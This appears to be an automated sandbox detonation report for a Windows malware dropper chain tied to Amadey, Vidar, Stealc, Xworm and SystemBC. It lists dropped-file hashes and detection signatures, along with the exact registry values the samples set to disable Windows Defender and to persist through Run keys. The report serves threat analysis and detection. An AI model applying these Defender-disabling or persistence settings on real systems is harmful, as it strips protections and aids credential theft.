| SHA256 | c4508a44ccc677828dbd163ad8f1aa9bb2fed8ed9a86ff69fc3b718cb69f3db0 |
| SHA512 | cc0065aec78e041a67e1973add7f87a383c253a96e523022dbff9ad9a71d921c2d6f168adc50bbb992c39ecb288904997ac161b05fdd6fc12fe6f1f5831c53e4 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\db\data.safe.bin
| MD5 | a6d069317fac86dcea089645da03a774 |
| SHA1 | e3873b7e7c8256dba2a5c0ef73299fa3d6e10739 |
| SHA256 | b2ec2cf9504c6a1295211e3904f310ccc34199b1654189f9a5f74e179dad1e16 |
| SHA512 | da5166d1a9db655b2dddbfc7b8e8a8620c1932b4e7daa376d1e0a265270bc01d4fcb936c1070be21c924f3cfc9bd60acb5fc4225efbd249f9bf9a259fd3fe536 |
memory/2668-731-0x0000000006940000-0x0000000006FD7000-memory.dmp
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
| MD5 | 96c542dec016d9ec1ecc4dddfcbaac66 |
| SHA1 | 6199f7648bb744efa58acf7b96fee85d938389e4 |
| SHA256 | 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798 |
| SHA512 | cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\activity-stream.discovery_stream.json.tmp
| MD5 | ae7c305a3c228d3cc12291c8adf2bfc4 |
| SHA1 | d88fb4c63a5c1eadc05c53a5f4fc78d463c482ab |
| SHA256 | 6364157ebedd296ceba1aebda06ede3524fed90fec7551cc656d92a7d578e79d |
| SHA512 | b54eb3d473651257faecbe0a28be7472b280b780d13aff61205c587ced20654580cc9ece95f3c2b4b71cd31b9e8d8083f8840bdb642f2e4ef8aac9e3f10765b7 |
memory/2844-791-0x0000000000400000-0x0000000000840000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe
| MD5 | e787e8998f5306a754d625d7e29bbeb5 |
| SHA1 | 14e056dbf0b3991664910ee3a1d23a4bb2c0253d |
| SHA256 | 93339b4579800e861b8606cd011c6d919790c72691346eede1aa5d116514672d |
| SHA512 | 30463019ed1ba9aa0a46623f9068b842161c03f03bbd98da21584abf9c913beade0df4ae758c13f20dcd7937a26f1a6c7c5e6f785c75ce05ea500a7fe6d240f6 |
memory/2668-790-0x0000000000330000-0x00000000007DB000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\prefs-1.js
| MD5 | 13410ed1ef0840b0db333ebe922d6454 |
| SHA1 | 1e5a1ebc1bed46375f1cde5e09a8019f548ae8ae |
| SHA256 | 6271a6772f0cfad840b5459c6c2f8da0c7846f4349bef8111cf934ce5b4c3a35 |
| SHA512 | 8dc0c0d2e068edc9806a86f9caa7c0bfc9bd4d592c7a525cc900ab70221eb744c2653ff54e65aa0678fdcfbeb2c39af37eabca55d76b7c29a9f4587cb90059cd |
memory/3640-824-0x0000000000EC0000-0x0000000001332000-memory.dmp
memory/3640-830-0x0000000000EC0000-0x0000000001332000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe
| MD5 | 745e4bcf3d176ea5e82a7c26a6733757 |
| SHA1 | 499cf0a28c9469faabae1e0f998c6a9b3e82862f |
| SHA256 | 8af6936111d0ba881e34ec715d1383dc90c017cd5ca3f51f1d69dc02c0aa2c63 |
| SHA512 | bd3fe79f49b060ae01766ca3e424a466c5ca652863a00fd23109e177bc7f6b2856eb513ea18ebbf5c3bee8820f817c50fadda44e12fe79656fbe6bb811aba69d |
memory/2844-862-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2668-861-0x0000000000330000-0x00000000007DB000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe
| MD5 | 47177b7fbf1ce282fb87da80fd264b3f |
| SHA1 | d07d2f9624404fa882eb94ee108f222d76bbbd4c |
| SHA256 | e3a190fc0f3e2be612c896ad1bda174271ee57d493f1b39030de1cbb5b7090eb |
| SHA512 | 059db11d303355b85e94031a54b0e6bac30bc9e2475bf3fceb9c01063af6f593d455fb54f8893ca37a150b598a9863b04f37056ef589656a6e83da719b330db9 |
memory/3240-873-0x0000000000B80000-0x0000000000B90000-memory.dmp
memory/3640-872-0x0000000000EC0000-0x0000000001332000-memory.dmp
memory/2800-886-0x00000000009A0000-0x00000000009B0000-memory.dmp
memory/3632-891-0x0000000000380000-0x0000000000689000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 0e8d437c8951e606b3221594a9993bdc |
| SHA1 | 8fa7d6483c0890e44c293d457cbf4b94045a5d59 |
| SHA256 | 56f571a7f447bd0b41c37d42479758481632de0cb2a33eadae1d0f4986c0b7c4 |
| SHA512 | 1db3048ae9444e855d0be53aea7ce40ee6e6e75561b7922409d0f9e44219487f6dcb10c0b239918625e1eeb58f5b93162c05e7b21082fc0bbe0cc19b8410ea8b |
Analysis: behavioral2
Detonation Overview
Submitted
2025-03-05 22:28
Reported
2025-03-05 22:30
Platform
win10v2004-20250217-en
Max time kernel
146s
Max time network
151s
Command Line
Signatures
Amadey
Amadey family
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Healer an antivirus disabler dropper
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Healer
Healer family
LiteHTTP
Litehttp family
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe | N/A |
Modifies Windows Defender TamperProtection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe | N/A |
Modifies Windows Defender notification settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications | C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe | N/A |
Stealc
Stealc family
SystemBC
Systembc family
Vidar
Vidar family
Xworm
Xworm family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107410101\263971d093.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107370101\c29c440560.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\BB8Z9QLVS663O4EQKUQWIVS.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107380101\9bd1404279.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
.NET Reactor proctector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107380101\9bd1404279.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107380101\9bd1404279.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107410101\263971d093.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107370101\c29c440560.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\BB8Z9QLVS663O4EQKUQWIVS.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\BB8Z9QLVS663O4EQKUQWIVS.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107410101\263971d093.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107370101\c29c440560.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\dll32.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107370101\c29c440560.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\BB8Z9QLVS663O4EQKUQWIVS.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107380101\9bd1404279.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107410101\263971d093.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine | C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe | N/A |
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\Oar936gK\\Anubis.exe\"" | C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c29c440560.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107370101\\c29c440560.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9bd1404279.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107380101\\9bd1404279.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4b886460ab.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107390101\\4b886460ab.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8809d7d07b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107400101\\8809d7d07b.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107370101\c29c440560.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BB8Z9QLVS663O4EQKUQWIVS.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107380101\9bd1404279.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107410101\263971d093.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4596 set thread context of 452 | N/A | C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe | C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe |
| PID 4496 set thread context of 2668 | N/A | C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe | C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107280101\Ps7WqSx.exe | N/A |
